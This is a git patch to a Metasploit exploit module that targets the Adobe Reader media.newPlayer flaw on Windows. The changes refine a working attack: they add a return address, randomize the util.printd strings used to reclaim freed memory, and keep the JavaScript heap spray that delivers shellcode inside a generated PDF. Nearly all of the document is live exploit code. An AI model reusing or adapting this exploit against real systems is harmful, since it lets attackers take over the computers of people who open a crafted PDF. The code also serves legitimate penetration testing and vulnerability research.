From 2baa4a1efa5a088fa622baa32dec4ff282affeec Mon Sep 17 00:00:00 2001
From: Joshua Drake <github.jdrake@qoop.org>
Date: Thu, 17 Dec 2009 05:16:35 +0000
Subject: [PATCH] port changes from Lurene to browser version

git-svn-id: file:///home/svn/framework3/trunk@7901 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../windows/browser/adobe_media_newplayer.rb  | 22 ++++++++++++++-----
 1 file changed, 16 insertions(+), 6 deletions(-)

diff --git a/modules/exploits/windows/browser/adobe_media_newplayer.rb b/modules/exploits/windows/browser/adobe_media_newplayer.rb
index 211524996e..bf3d76e218 100644
--- a/modules/exploits/windows/browser/adobe_media_newplayer.rb
+++ b/modules/exploits/windows/browser/adobe_media_newplayer.rb
@@ -66,9 +66,10 @@ class Metasploit3 < Msf::Exploit::Remote
 					# reader 9.0.0 - untested
 					# reader 9.1.0 - works
 					# reader 9.2 - works (no debugger, no DEP)
-					[ 'Adobe Reader Windows Universal (JS Heap Spray)',
+					[ 'Adobe Reader Windows English (JS Heap Spray)',
 						{
-							'Size'      => (0x10000/2)
+							'Size'      => (0x10000/2),
+							'Ret'       => 0x2e0031
 						}
 					],
 				],
@@ -93,13 +94,22 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Make some nops
 		nops    = Rex::Text.to_unescape(make_nops(4))
 
+		len = 72
+		
 		# Randomize variables
 		rand1  = rand_text_alpha(rand(100) + 1)
 		rand2  = rand_text_alpha(rand(100) + 1)
-
+		rand3  = rand_text_alpha(rand(100) + 1)
+		rand4  = rand_text_alpha(len/2);
+		rand5  = rand_text_alpha(len/2);
+		
+		retstring = Rex::Text.to_unescape([target.ret].pack('V') + rand_text_alpha(len-4))
+		
+		# The printd strings are 72 bytes (??)
 		script = %Q|
 var #{rand1} = unescape("#{shellcode}");
 var #{rand2} = unescape("#{nops}");
+var #{rand3} = unescape("#{retstring}");
 
 while(#{rand2}.length <= #{target['Size']}) #{rand2}+=#{rand2};
 #{rand2}=#{rand2}.substring(0,#{target['Size']} - #{rand1}.length);
@@ -110,10 +120,10 @@ for(i=0;i<0x2000;i++) {
   memory[i]= #{rand2} + #{rand1};
 }
 
-util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
-util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
+util.printd("#{rand4}", new Date());
+util.printd("#{rand5}", new Date());
 try {this.media.newPlayer(null);} catch(e) {}
-util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
+util.printd("#{rand3}", new Date());
 |
 		# Create the pdf
 		pdf = make_pdf(script)